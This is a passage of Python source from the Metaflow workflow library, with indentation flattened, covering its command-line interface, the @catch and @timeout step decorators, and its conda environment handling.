hl = False
kwargs['fg'] = fg
kwargs['bold'] = bold
click.secho(span, **kwargs)
else:
hl = True
kwargs['fg'] = highlight
kwargs['bold'] = hl_bold
click.secho(span, **kwargs)
if nl:
kwargs['nl'] = True
click.secho('', **kwargs)
if bottom:
click.secho(ERASE_TO_EOL, **kwargs)
def logger(body='', system_msg=False, head='', bad=False, timestamp=True):
if timestamp:
tstamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-3]
click.secho(tstamp + ' ', fg=LOGGER_TIMESTAMP, nl=False)
if head:
click.secho(head, fg=LOGGER_COLOR, nl=False)
click.secho(body,
bold=system_msg,
fg=LOGGER_BAD_COLOR if bad else None)
@click.group()
def cli(ctx):
pass
@cli.command(help='Check that the flow is valid (default).')
@click.option('--warnings/--no-warnings',
default=False,
show_default=True,
help='Show all Pylint warnings, not just errors.')
@click.pass_obj
def check(obj, warnings=False):
_check(obj.graph, obj.flow, obj.environment, pylint=obj.pylint, warnings=warnings)
fname = inspect.getfile(obj.flow.__class__)
echo("\n*'{cmd} show'* shows a description of this flow.\n"
"*'{cmd} run'* runs the flow locally.\n"
"*'{cmd} help'* shows all available commands and options.\n"
.format(cmd=fname), highlight='magenta', highlight_bold=False)
@cli.command(help='Show structure of the flow.')
@click.pass_obj
def show(obj):
echo_always('\n%s' % obj.graph.doc)
for _, node in sorted((n.func_lineno, n) for n in obj.graph):
echo_always('\nStep *%s*' % node.name, err=False)
echo_always(node.doc if node.doc else '?', indent=True, err=False)
if node.type != 'end':
echo_always('*=>* %s' % ', '.join('*%s*' % n for n in node.out_funcs),
indent=True,
highlight='magenta',
highlight_bold=False,
err=False)
echo_always('')
@cli.command(help='Show all available commands.')
@click.pass_context
def help(ctx):
print(ctx.parent.get_help())
@cli.command(help='Output internal state of the flow graph.')
@click.pass_obj
def output_raw(obj):
echo('Internal representation of the flow:',
fg='magenta',
bold=False)
echo_always(str(obj.graph), err=False)
@cli.command(help='Visualize the flow with Graphviz.')
@click.pass_obj
def output_dot(obj):
echo('Visualizing the flow as a GraphViz graph',
fg='magenta',
bold=False)
echo("Try piping the output to 'dot -Tpng -o graph.png' to produce "
"an actual image.", indent=True)
echo_always(obj.graph.output_dot(), err=False)
@cli.command(help='Get data artifacts of a task or all tasks in a step. '
'The format for input-path is either <run_id>/<step_name> or '
'<run_id>/<step_name>/<task_id>.')
@click.argument('input-path')
@click.option('--private/--no-private',
default=False,
show_default=True,
help='Show also private attributes.')
@click.option('--max-value-size',
default=1000,
show_default=True,
type=int,
help='Show only values that are smaller than this number. '
'Set to 0 to see only keys.')
@click.option('--include',
type=str,
default='',
help='Include only artifacts in the given comma-separated list.')
@click.option('--file',
type=str,
default=None,
help='Serialize artifacts in the given file.')
@click.pass_obj
def dump(obj,
input_path,
private=None,
max_value_size=None,
include=None,
file=None):
output = {}
kwargs = {'show_private': private,
'max_value_size': max_value_size,
'include': {t for t in include.split(',') if t}}
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(
obj.echo, create_on_absent=False)
if obj.datastore.datastore_root is None:
raise CommandException(
"Could not find the location of the datastore -- did you correctly set the "
"METAFLOW_DATASTORE_SYSROOT_%s environment variable" % (obj.datastore.TYPE).upper())
# Pathspec can either be run_id/step_name or run_id/step_name/task_id.
parts = input_path.split('/')
if len(parts) == 2:
run_id, step_name = parts
task_id = None
elif len(parts) == 3:
run_id, step_name, task_id = parts
else:
raise CommandException("input_path should either be run_id/step_name"
"or run_id/step_name/task_id")
from metaflow.datastore.datastore_set import MetaflowDatastoreSet
datastore_set = MetaflowDatastoreSet(
obj.datastore,
obj.flow.name,
run_id,
steps=[step_name],
metadata=obj.metadata,
monitor=obj.monitor,
event_logger=obj.event_logger,
prefetch_data_artifacts=kwargs.get('include'))
if task_id:
ds_list = [datastore_set.get_with_pathspec(input_path)]
else:
ds_list = list(datastore_set) # get all tasks
for ds in ds_list:
echo('Dumping output of run_id=*{run_id}* '
'step=*{step}* task_id=*{task_id}*'.format(run_id=ds.run_id,
step=ds.step_name,
task_id=ds.task_id),
fg='magenta')
if file is None:
echo_always(ds.format(**kwargs),
highlight='green',
highlight_bold=False,
err=False)
else:
output[ds.pathspec] = ds.to_dict(**kwargs)
if file is not None:
with open(file, 'wb') as f:
pickle.dump(output, f, protocol=pickle.HIGHEST_PROTOCOL)
echo('Artifacts written to *%s*' % file)
@cli.command(help='Show stdout/stderr produced by a task or all tasks in a step. '
'The format for input-path is either <run_id>/<step_name> or '
'<run_id>/<step_name>/<task_id>.')
@click.argument('input-path')
@click.option('--stdout/--no-stdout',
default=False,
show_default=True,
help='Show stdout of the task.')
@click.option('--stderr/--no-stderr',
default=False,
show_default=True,
help='Show stderr of the task.')
@click.option('--both/--no-both',
default=True,
show_default=True,
help='Show both stdout and stderr of the task.')
@click.pass_obj
def logs(obj, input_path, stdout=None, stderr=None, both=None):
types = set()
if stdout:
types.add('stdout')
both = False
if stderr:
types.add('stderr')
both = False
if both:
types.update(('stdout', 'stderr'))
# Pathspec can either be run_id/step_name or run_id/step_name/task_id.
parts = input_path.split('/')
if len(parts) == 2:
run_id, step_name = parts
task_id = None
elif len(parts) == 3:
run_id, step_name, task_id = parts
else:
raise CommandException("input_path should either be run_id/step_name"
"or run_id/step_name/task_id")
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(
obj.echo, create_on_absent=False)
if obj.datastore.datastore_root is None:
raise CommandException(
"Could not find the location of the datastore -- did you correctly set the "
"METAFLOW_DATASTORE_SYSROOT_%s environment variable" % (obj.datastore.TYPE).upper())
from metaflow.datastore.datastore_set import MetaflowDatastoreSet
datastore_set = MetaflowDatastoreSet(
obj.datastore,
obj.flow.name,
run_id,
steps=[step_name],
metadata=obj.metadata,
monitor=obj.monitor,
event_logger=obj.event_logger)
if task_id:
ds_list = [datastore_set.get_with_pathspec(input_path)]
else:
ds_list = list(datastore_set) # get all tasks
for ds in ds_list:
echo('Dumping logs of run_id=*{run_id}* '
'step=*{step}* task_id=*{task_id}*'.format(run_id=ds.run_id,
step=ds.step_name,
task_id=ds.task_id),
fg='magenta')
for typ in ('stdout', 'stderr'):
if typ in types:
echo(typ, bold=True)
click.secho(ds.load_log(typ).decode('UTF-8', errors='replace'),
nl=False)
# TODO - move step and init under a separate 'internal' subcommand
@cli.command(help="Internal command to execute a single task.")
@click.argument('step-name')
@click.option('--run-id',
default=None,
required=True,
help='ID for one execution of all steps in the flow.')
@click.option('--task-id',
default=None,
required=True,
show_default=True,
help='ID for this instance of the step.')
@click.option('--input-paths',
help='A comma-separated list of pathspecs '
'specifying inputs for this step.')
@click.option('--split-index',
type=int,
default=None,
show_default=True,
help='Index of this foreach split.')
@click.option('--tag',
'tags',
multiple=True,
default=None,
help="Annotate this run with the given tag. You can specify "
"this option multiple times to attach multiple tags in "
"the task.")
@click.option('--namespace',
'user_namespace',
default=None,
help="Change namespace from the default (your username) to "
"the specified tag.")
@click.option('--retry-count',
default=0,
help="How many times we have attempted to run this task.")
@click.option('--max-user-code-retries',
default=0,
help="How many times we should attempt running the user code.")
@click.option('--clone-only',
default=None,
help="Pathspec of the origin task for this task to clone. Do "
"not execute anything.")
@click.option('--clone-run-id',
default=None,
help="Run id of the origin flow, if this task is part of a flow "
"being resumed.")
@click.pass_obj
def step(obj,
step_name,
tags=None,
run_id=None,
task_id=None,
input_paths=None,
split_index=None,
user_namespace=None,
retry_count=None,
max_user_code_retries=None,
clone_only=None,
clone_run_id=None):
if user_namespace is not None:
namespace(user_namespace or None)
func = None
try:
func = getattr(obj.flow, step_name)
except:
raise CommandException("Step *%s* doesn't exist." % step_name)
if not func.is_step:
raise CommandException("Function *%s* is not a step." % step_name)
echo('Executing a step, *%s*' % step_name,
fg='magenta',
bold=False)
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
obj.metadata.add_sticky_tags(tags=tags)
paths = decompress_list(input_paths) if input_paths else []
task = MetaflowTask(obj.flow,
obj.datastore,
obj.metadata,
obj.environment,
obj.logger,
obj.event_logger,
obj.monitor)
if clone_only:
task.clone_only(step_name,
run_id,
task_id,
clone_only)
else:
task.run_step(step_name,
run_id,
task_id,
clone_run_id,
paths,
split_index,
retry_count,
max_user_code_retries)
echo('Success', fg='green', bold=True, indent=True)
@parameters.add_custom_parameters
@cli.command(help="Internal command to initialize a run.")
@click.option('--run-id',
default=None,
required=True,
help='ID for one execution of all steps in the flow.')
@click.option('--task-id',
default=None,
required=True,
help='ID for this instance of the step.')
@click.pass_obj
def init(obj, run_id=None, task_id=None, **kwargs):
# init is a separate command instead of an option in 'step'
# since we need to capture user-specified parameters with
# @add_custom_parameters. Adding custom parameters to 'step'
# is not desirable due to the possibility of name clashes between
# user-specified parameters and our internal options. Note that
# user-specified parameters are often defined as environment
# variables.
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
run_id=run_id)
parameters.set_parameters(obj.flow, kwargs)
runtime.persist_parameters(task_id=task_id)
def common_run_options(func):
@click.option('--tag',
'tags',
multiple=True,
default=None,
help="Annotate this run with the given tag. You can specify "
"this option multiple times to attach multiple tags in "
"the run.")
@click.option('--max-workers',
default=16,
show_default=True,
help='Maximum number of parallel processes.')
@click.option('--max-num-splits',
default=100,
show_default=True,
help='Maximum number of splits allowed in a foreach. This '
'is a safety check preventing bugs from triggering '
'thousands of steps inadvertently.')
@click.option('--max-log-size',
default=10,
show_default=True,
help='Maximum size of stdout and stderr captured in '
'megabytes. If a step outputs more than this to '
'stdout/stderr, its output will be truncated.')
@click.option('--with',
'decospecs',
multiple=True,
help="Add a decorator to all steps. You can specify this "
"option multiple times to attach multiple decorators "
"in steps.")
@click.option('--run-id-file',
default=None,
show_default=True,
type=str,
help="Write the ID of this run to the file specified.")
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
@click.option('--origin-run-id',
default=None,
help="ID of the run that should be resumed. By default, the "
"last run executed locally.")
@click.argument('step-to-rerun',
required=False)
@cli.command(help='Resume execution of a previous run of this flow.')
@common_run_options
@click.pass_obj
def resume(obj,
tags=None,
step_to_rerun=None,
origin_run_id=None,
max_workers=None,
max_num_splits=None,
max_log_size=None,
decospecs=None,
run_id_file=None):
before_run(obj, tags, decospecs + obj.environment.decospecs())
if origin_run_id is None:
origin_run_id = get_latest_run_id(obj.echo, obj.flow.name)
if origin_run_id is None:
raise CommandException("A previous run id was not found. Specify --origin-run-id.")
if step_to_rerun is None:
clone_steps = set()
else:
clone_steps = {step_to_rerun}
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
clone_run_id=origin_run_id,
clone_steps=clone_steps,
max_workers=max_workers,
max_num_splits=max_num_splits,
max_log_size=max_log_size * 1024 * 1024)
runtime.persist_parameters()
runtime.execute()
write_run_id(run_id_file, runtime.run_id)
@parameters.add_custom_parameters
@cli.command(help='Run the workflow locally.')
@common_run_options
@click.option('--namespace',
'user_namespace',
default=None,
help="Change namespace from the default (your username) to "
"the specified tag. Note that this option does not alter "
"tags assigned to the objects produced by this run, just "
"what existing objects are visible in the client API. You "
"can enable the global namespace with an empty string."
"--namespace=")
@click.pass_obj
def run(obj,
tags=None,
max_workers=None,
max_num_splits=None,
max_log_size=None,
decospecs=None,
run_id_file=None,
user_namespace=None,
**kwargs):
    if user_namespace is not None:
namespace(user_namespace or None)
before_run(obj, tags, decospecs + obj.environment.decospecs())
runtime = NativeRuntime(obj.flow,
obj.graph,
obj.datastore,
obj.metadata,
obj.environment,
obj.package,
obj.logger,
obj.entrypoint,
obj.event_logger,
obj.monitor,
max_workers=max_workers,
max_num_splits=max_num_splits,
max_log_size=max_log_size * 1024 * 1024)
write_latest_run_id(obj, runtime.run_id)
write_run_id(run_id_file, runtime.run_id)
parameters.set_parameters(obj.flow, kwargs)
runtime.persist_parameters()
runtime.execute()
def write_run_id(run_id_file, run_id):
if run_id_file is not None:
with open(run_id_file, 'w') as f:
f.write(str(run_id))
def before_run(obj, tags, decospecs):
# There's a --with option both at the top-level and for the run
# subcommand. Why?
#
# "run --with shoes" looks so much better than "--with shoes run".
# This is a very common use case of --with.
#
    # A downside is that we need to have the following decorator handling
# in two places in this module and we need to make sure that
# _init_decorators doesn't get called twice.
if decospecs:
decorators._attach_decorators(obj.flow, decospecs)
obj.graph = FlowGraph(obj.flow.__class__)
obj.check(obj.graph, obj.flow, obj.environment, pylint=obj.pylint)
#obj.environment.init_environment(obj.logger)
if obj.datastore.datastore_root is None:
obj.datastore.datastore_root = obj.datastore.get_datastore_root_from_config(obj.echo)
decorators._init_decorators(
obj.flow, obj.graph, obj.environment, obj.datastore, obj.logger)
obj.metadata.add_sticky_tags(tags=tags)
# Package working directory only once per run.
# We explicitly avoid doing this in `start` since it is invoked for every
# step in the run.
# TODO(crk): Capture time taken to package and log to keystone.
obj.package = MetaflowPackage(obj.flow, obj.environment, obj.logger, obj.package_suffixes)
@cli.command(help='Print the Metaflow version')
@click.pass_obj
def version(obj):
echo_always(obj.version)
@click.command(cls=click.CommandCollection,
sources=[cli] + plugins.get_plugin_cli(),
invoke_without_command=True)
@click.option('--quiet/--not-quiet',
show_default=True,
default=False,
help='Suppress unnecessary messages')
@click.option('--metadata',
default=DEFAULT_METADATA,
show_default=True,
type=click.Choice([m.TYPE for m in METADATAPROVIDERS]),
help='Metadata service type')
@click.option('--environment',
default='local',
show_default=True,
type=click.Choice(['local'] + [m.TYPE for m in ENVIRONMENTS]),
help='Execution environment type')
@click.option('--datastore',
default=DEFAULT_DATASTORE,
show_default=True,
type=click.Choice(DATASTORES),
help='Data backend type')
@click.option('--datastore-root',
help='Root path for datastore')
@click.option('--package-suffixes',
help='A comma-separated list of file suffixes to include '
'in the code package.',
default='.py',
show_default=True)
@click.option('--with',
'decospecs',
multiple=True,
help="Add a decorator to all steps. You can specify this option "
"multiple times to attach multiple decorators in steps.")
@click.option('--pylint/--no-pylint',
default=True,
show_default=True,
help='Run Pylint on the flow if pylint is installed.')
@click.option('--coverage',
is_flag=True,
default=False,
show_default=True,
help='Measure code coverage using coverage.py.')
@click.option('--event-logger',
default='nullSidecarLogger',
show_default=True,
type=click.Choice(LOGGING_SIDECAR),
help='type of event logger used')
@click.option('--monitor',
default='nullSidecarMonitor',
show_default=True,
type=click.Choice(MONITOR_SIDECAR),
help='Monitoring backend type')
@click.pass_context
def start(ctx,
quiet=False,
metadata=None,
environment=None,
datastore=None,
datastore_root=None,
decospecs=None,
package_suffixes=None,
pylint=None,
coverage=None,
event_logger=None,
monitor=None):
global echo
if quiet:
echo = echo_dev_null
else:
echo = echo_always
ctx.obj.version = metaflow_version.get_version()
echo('Metaflow %s' % ctx.obj.version, fg='magenta', bold=True, nl=False)
echo(" executing *%s*" % ctx.obj.flow.name, fg='magenta', nl=False)
echo(" for *%s*" % resolve_identity(), fg='magenta')
if decospecs:
decorators._attach_decorators(ctx.obj.flow, decospecs)
if coverage:
from coverage import Coverage
cov = Coverage(data_suffix=True,
auto_data=True,
source=['metaflow'],
branch=True)
cov.start()
ctx.obj.echo = echo
ctx.obj.echo_always = echo_always
ctx.obj.graph = FlowGraph(ctx.obj.flow.__class__)
ctx.obj.logger = logger
ctx.obj.check = _check
ctx.obj.pylint = pylint
ctx.obj.top_cli = cli
ctx.obj.package_suffixes = package_suffixes.split(',')
ctx.obj.reconstruct_cli = _reconstruct_cli
ctx.obj.event_logger = EventLogger(event_logger)
ctx.obj.environment = [e for e in ENVIRONMENTS + [MetaflowEnvironment]
if e.TYPE == environment][0](ctx.obj.flow)
ctx.obj.environment.validate_environment(echo)
ctx.obj.monitor = Monitor(monitor, ctx.obj.environment, ctx.obj.flow.name)
ctx.obj.monitor.start()
ctx.obj.metadata = [m for m in METADATAPROVIDERS
if m.TYPE == metadata][0](ctx.obj.environment,
ctx.obj.flow,
ctx.obj.event_logger,
ctx.obj.monitor)
ctx.obj.datastore = DATASTORES[datastore]
ctx.obj.datastore_root = datastore_root
if ctx.invoked_subcommand not in ('run', 'resume'):
# run/resume are special cases because they can add more decorators with --with,
# so they have to take care of themselves.
decorators._attach_decorators(
ctx.obj.flow, ctx.obj.environment.decospecs())
decorators._init_decorators(
ctx.obj.flow, ctx.obj.graph, ctx.obj.environment, ctx.obj.datastore, ctx.obj.logger)
#TODO (savin): Enable lazy instantiation of package
ctx.obj.package = None
if ctx.invoked_subcommand is None:
ctx.invoke(check)
def _reconstruct_cli(params):
for k, v in params.items():
if v:
if k == 'decospecs':
k = 'with'
k = k.replace('_', '-')
if not isinstance(v, tuple):
v = [v]
for value in v:
yield '--%s' % k
if not isinstance(value, bool):
yield str(value)
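# Example of the reconstruction above (the params dict is hypothetical; output
# order follows dict iteration order):
#   list(_reconstruct_cli({'decospecs': ('retry',), 'max_workers': 4}))
#   -> ['--with', 'retry', '--max-workers', '4']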
def _check(graph, flow, environment, pylint=True, warnings=False, **kwargs):
echo("Validating your flow...", fg='magenta', bold=False)
linter = lint.linter
# TODO set linter settings
linter.run_checks(graph, **kwargs)
echo('The graph looks good!', fg='green', bold=True, indent=True)
if pylint:
echo("Running pylint...", fg='magenta', bold=False)
fname = inspect.getfile(flow.__class__)
pylint = PyLint(fname)
if pylint.has_pylint():
pylint.run(warnings=warnings, pylint_config=environment.pylint_config(), logger=echo_always)
echo('Pylint is happy!',
fg='green',
bold=True,
indent=True)
else:
echo("Pylint not found, so extra checks are disabled.",
fg='green',
indent=True,
bold=False)
def print_metaflow_exception(ex):
echo_always(ex.headline, indent=True, nl=False, bold=True)
if ex.line_no is None:
echo_always(':')
else:
echo_always(' on line %d:' % ex.line_no, bold=True)
echo_always(ex.message, indent=True, bold=False, padding_bottom=True)
def print_unknown_exception(ex):
echo_always('Internal error', indent=True, bold=True)
echo_always(traceback.format_exc(), highlight=None, highlight_bold=False)
class CliState(object):
def __init__(self, flow):
self.flow = flow
def main(flow, args=None, handle_exceptions=True, entrypoint=None):
# Ignore warning(s) and prevent spamming the end-user.
# TODO: This serves as a short term workaround for RuntimeWarning(s) thrown
# in py3.8 related to log buffering (bufsize=1).
import warnings
warnings.filterwarnings('ignore')
if entrypoint is None:
entrypoint = [sys.executable, sys.argv[0]]
state = CliState(flow)
state.entrypoint = entrypoint
parameters.set_parameter_context(flow.name)
try:
if args is None:
start(auto_envvar_prefix='METAFLOW', obj=state)
else:
try:
start.main(args=args,
obj=state,
auto_envvar_prefix='METAFLOW')
except SystemExit as e:
return e.code
except MetaflowException as x:
if handle_exceptions:
print_metaflow_exception(x)
sys.exit(1)
else:
raise
except Exception as x:
if handle_exceptions:
print_unknown_exception(x)
sys.exit(1)
else:
            raise
import traceback
from metaflow.exception import MetaflowException,\
MetaflowExceptionWrapper
from metaflow.decorators import StepDecorator
NUM_FALLBACK_RETRIES = 3
class FailureHandledByCatch(MetaflowException):
headline = 'Task execution failed but @catch handled it'
def __init__(self, retry_count):
msg = 'Task execution kept failing over %d attempts. '\
'Your code did not raise an exception. Something '\
'in the execution environment caused the failure.' % retry_count
super(FailureHandledByCatch, self).__init__(msg)
class CatchDecorator(StepDecorator):
"""
Step decorator to specify error handling for your step.
This decorator indicates that exceptions in the step should be caught and not fail the entire
flow.
This can be used in conjunction with the @retry decorator. In that case, catch will only
activate if all retries fail and will catch the last exception thrown by the last retry.
To use, annotate your step as follows:
```
@catch(var='foo')
@step
def myStep(self):
...
```
Parameters
----------
var : string
Name of the artifact in which to store the caught exception. If not specified,
the exception is not stored
print_exception : bool
Determines whether or not the exception is printed to stdout when caught. Defaults
to True
"""
name = 'catch'
defaults = {'var': None,
'print_exception': True}
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
# handling _foreach_var and _foreach_num_splits requires some
# deeper thinking, so let's not support that use case for now
self.logger = logger
if graph[step].type == 'foreach':
raise MetaflowException('@catch is defined for the step *%s* '
'but @catch is not supported in foreach '
'split steps.' % step)
def _print_exception(self, step, flow):
self.logger(head='@catch caught an exception from %s' % flow,
timestamp=False)
for line in traceback.format_exc().splitlines():
self.logger('> %s' % line, timestamp=False)
def _set_var(self, flow, val):
var = self.attributes.get('var')
if var:
setattr(flow, var, val)
def task_exception(self,
exception,
step,
flow,
graph,
retry_count,
max_user_code_retries):
if self.attributes['print_exception']:
self._print_exception(step, flow)
# pretend that self.next() was called as usual
flow._transition = (graph[step].out_funcs, None, None)
# store the exception
picklable = MetaflowExceptionWrapper(exception)
flow._catch_exception = picklable
self._set_var(flow, picklable)
return True
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
# there was no exception, set the exception var (if any) to None
self._set_var(flow, None)
def step_task_retry_count(self):
return 0, NUM_FALLBACK_RETRIES
def task_decorate(self,
step_func,
func,
graph,
retry_count,
max_user_code_retries):
# if the user code has failed max_user_code_retries times, @catch
# runs a piece of fallback code instead. This way we can continue
        # running the flow downstream, as we have a proper entry for this task.
def fallback_step(inputs=None):
raise FailureHandledByCatch(retry_count)
if retry_count > max_user_code_retries:
return fallback_step
else:
            return step_func
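# Downstream sketch (the artifact name is hypothetical): with @catch(var='compute_failed')
# on a step, a later step can inspect the stored MetaflowExceptionWrapper, which is
# None when the step succeeded:
#
#   if self.compute_failed:
#       print('caught:', self.compute_failed)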
import signal
import traceback
from metaflow.exception import MetaflowException
from metaflow.decorators import StepDecorator
class TimeoutException(MetaflowException):
headline = '@timeout'
class TimeoutDecorator(StepDecorator):
"""
Step decorator to specify a timeout for your step.
This decorator is useful if this step may hang indefinitely.
This can be used in conjunction with the @retry decorator as well as the @catch decorator.
A timeout is considered to be an exception thrown by the step and will cause the step to be
retried if needed and the exception will be caught by the 'catch' decorator if present.
To use, annotate your step as follows:
```
@timeout(minutes=1)
@step
def myStep(self):
...
```
Note that all the values specified in parameters are added together so if you specify
60 seconds and 1 hour, the decorator will have an effective timeout of 1 hour and 1 minute.
Parameters
----------
seconds : int
Number of seconds to wait prior to timing out.
minutes : int
Number of minutes to wait prior to timing out
hours : int
Number of hours to wait prior to timing out
minutes_between_retries : int
Number of minutes between retries
"""
name = 'timeout'
defaults = {'seconds': 0,
'minutes': 0,
'hours': 0}
def __init__(self, *args, **kwargs):
super(TimeoutDecorator, self).__init__(*args, **kwargs)
# Initialize secs in __init__ so other decorators could safely use this
# value without worrying about decorator order.
# Convert values in attributes to type:int since they can be type:str
# when passed using the CLI option --with.
self.secs = int(self.attributes['hours']) * 3600 +\
int(self.attributes['minutes']) * 60 +\
int(self.attributes['seconds'])
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
self.logger = logger
if not self.secs:
raise MetaflowException('Specify a duration for @timeout.')
def task_pre_step(self,
step_name,
datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_user_code_retries):
if retry_count <= max_user_code_retries:
# enable timeout only when executing user code
self.step_name = step_name
signal.signal(signal.SIGALRM, self._sigalrm_handler)
signal.alarm(self.secs)
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
signal.alarm(0)
def _sigalrm_handler(self, signum, frame):
def pretty_print_stack():
for line in traceback.format_stack():
if 'timeout_decorators.py' not in line:
for part in line.splitlines():
yield '> %s' % part
msg = 'Step {step_name} timed out after {hours} hours, '\
'{minutes} minutes, {seconds} seconds'\
.format(step_name=self.step_name, **self.attributes)
self.logger(msg)
raise TimeoutException('%s\nStack when the timeout was raised:\n%s'
% (msg, '\n'.join(pretty_print_stack())))
def get_run_time_limit_for_task(step_decos):
run_time_limit = 5 * 24 * 60 * 60 # 5 days.
for deco in step_decos:
if isinstance(deco, TimeoutDecorator):
run_time_limit = deco.secs
    return run_time_limit
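# Worked example of the duration math in TimeoutDecorator.__init__ (values are
# illustrative):
#   @timeout(hours=1, minutes=1)    -> secs == 3660
#   @timeout(minutes=1, seconds=30) -> secs == 90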
import json
import os
import sys
import tarfile
from metaflow.environment import MetaflowEnvironment
from metaflow.exception import MetaflowException
from .conda import Conda
from . import get_conda_manifest_path, CONDA_MAGIC_FILE
class CondaEnvironment(MetaflowEnvironment):
TYPE = 'conda'
_filecache = None
def __init__(self, flow):
self.flow = flow
self.local_root = None
def init_environment(self, logger):
# Print a message for now
logger("Bootstrapping conda environment...(this could take a few minutes)")
def decospecs(self):
# Apply conda decorator to all steps
return ('conda', )
def _get_conda_decorator(self, step_name):
step = next(step for step in self.flow if step.name == step_name)
decorator = next(deco for deco in step.decorators if deco.name == 'conda')
# Guaranteed to have a conda decorator because of self.decospecs()
return decorator
def _get_env_id(self, step_name):
conda_decorator = self._get_conda_decorator(step_name)
if conda_decorator.is_enabled():
return conda_decorator._env_id()
return None
def _get_executable(self, step_name):
env_id = self._get_env_id(step_name)
if env_id is not None:
return (os.path.join(env_id, "bin/python -s"))
return None
def set_local_root(self, ds_root):
self.local_root = ds_root
def bootstrap_commands(self, step_name):
# Bootstrap conda and execution environment for step
env_id = self._get_env_id(step_name)
if env_id is not None:
return [
"echo \'Bootstrapping environment.\'",
"python -m metaflow.plugins.conda.batch_bootstrap \"%s\" %s" % \
(self.flow.name, env_id),
"echo \'Environment bootstrapped.\'"
]
return []
def add_to_package(self):
# Add conda manifest file to job package at the top level.
path = get_conda_manifest_path(self.local_root, self.flow.name)
if os.path.exists(path):
return [(path, os.path.basename(path))]
else:
return []
def pylint_config(self):
# Disable (import-error) in pylint
return ["--disable=F0401"]
def executable(self, step_name):
# Get relevant python interpreter for step
executable = self._get_executable(step_name)
if executable is not None:
return executable
return super(CondaEnvironment, self).executable(step_name)
@classmethod
def get_client_info(cls, flow_name, metadata):
if cls._filecache is None:
from metaflow.client.filecache import FileCache
cls._filecache = FileCache()
info = metadata.get('code-package')
env_id = metadata.get('conda_env_id')
if info is None or env_id is None:
return {'type': 'conda'}
info = json.loads(info)
with cls._filecache.get_data(info['ds_type'], flow_name, info['sha']) as f:
tar = tarfile.TarFile(fileobj=f)
conda_file = tar.extractfile(CONDA_MAGIC_FILE)
if conda_file is None:
return {'type': 'conda'}
info = json.loads(conda_file.read().decode('utf-8'))
new_info = {
'type': 'conda',
'explicit': info[env_id]['explicit'],
'deps': info[env_id]['deps']}
        return new_info
import errno
import os
import json
import subprocess
import time
from distutils.version import LooseVersion
from metaflow.exception import MetaflowException
from metaflow.environment import InvalidEnvironmentException
from metaflow.util import which
class CondaException(MetaflowException):
headline = 'Conda ran into an error while setting up environment.'
def __init__(self, error):
if isinstance(error, (list,)):
error = '\n'.join(error)
msg = '{error}'.format(error=error)
super(CondaException, self).__init__(msg)
class CondaStepException(CondaException):
def __init__(self, exception, step):
msg = 'Step: {step}, Error: {error}'.format(step=step, error=exception.message)
super(CondaStepException, self).__init__(msg)
class Conda(object):
def __init__(self):
self._bin = which('conda')
if self._bin is None:
raise InvalidEnvironmentException('No conda installation found. '
'Install conda first.')
if LooseVersion(self._info()['conda_version']) < LooseVersion('4.6.0'):
raise InvalidEnvironmentException('Conda version 4.6.0 or newer '
'is required. Visit '
'https://docs.conda.io/en/latest/miniconda.html '
'for installation instructions.')
if 'conda-forge' not in self.config()['channels']:
raise InvalidEnvironmentException('Conda channel \'conda-forge\' '
'is required. Specify it with CONDA_CHANNELS '
'environment variable.')
def create(self, step_name, env_id, deps, architecture=None, explicit=False):
# Create the conda environment
try:
with CondaLock(self._env_lock_file(env_id)):
self._remove(env_id)
self._create(env_id, deps, explicit, architecture)
return self._deps(env_id)
except CondaException as e:
raise CondaStepException(e, step_name)
def remove(self, step_name, env_id):
# Remove the conda environment
try:
with CondaLock(self._env_lock_file(env_id)):
self._remove(env_id)
except CondaException as e:
raise CondaStepException(e, step_name)
def python(self, env_id):
# Get Python interpreter for the conda environment
return os.path.join(self._env_path(env_id), 'bin/python')
def environments(self, flow):
# List all conda environments associated with the flow
envs = self._info()['envs']
ret = {}
for env in envs:
if '/envs/' in env:
name = os.path.basename(env)
if name.startswith('metaflow_%s' % flow):
ret[name] = env
return ret
def config(self):
# Show conda installation configuration
return json.loads(self._call_conda(['config', '--show']))
def package_info(self, env_id):
# Show conda environment package configuration
# Not every parameter is exposed via conda cli hence this ignominy
metadata = os.path.join(self._env_path(env_id), 'conda-meta')
for path, dirs, files in os.walk(metadata):
for file in files:
if file.endswith('.json'):
with open(os.path.join(path, file)) as f:
yield json.loads(f.read())
def _info(self):
return json.loads(self._call_conda(['info']))
def _create(self, env_id, deps, explicit=False, architecture=None):
cmd = ['create', '--yes', '--no-default-packages',
'--name', env_id, '--quiet']
if explicit:
cmd.append('--no-deps')
cmd.extend(deps)
self._call_conda(cmd, architecture)
def _remove(self, env_id):
self._call_conda(['env', 'remove', '--name',
env_id, '--yes', '--quiet'])
def _install(self, env_id, deps, explicit=False):
cmd = ['install', '--yes', '--name', env_id, '--quiet']
if explicit:
cmd.append('--no-deps')
cmd.extend(deps)
self._call_conda(cmd)
def _install_order(self, env_id):
cmd = ['list', '--name', env_id, '--explicit']
response = self._call_conda(cmd).decode('utf-8')
emit = False
result = []
for line in response.splitlines():
if emit:
result.append(line.split('/')[-1])
if not emit and line == '@EXPLICIT':
emit = True
return result
def _deps(self, env_id):
exact_deps = []
urls = []
for package in self.package_info(env_id):
exact_deps.append('%s=%s=%s' % (package['name'], package['version'], package['build']))
urls.append(package['url'])
order = self._install_order(env_id)
return (exact_deps, urls, order)
def _env_path(self, env_id):
envs = self._info()['envs']
for env in envs:
if '/envs/' in env:
name = os.path.basename(env)
if name == env_id:
return env
return None
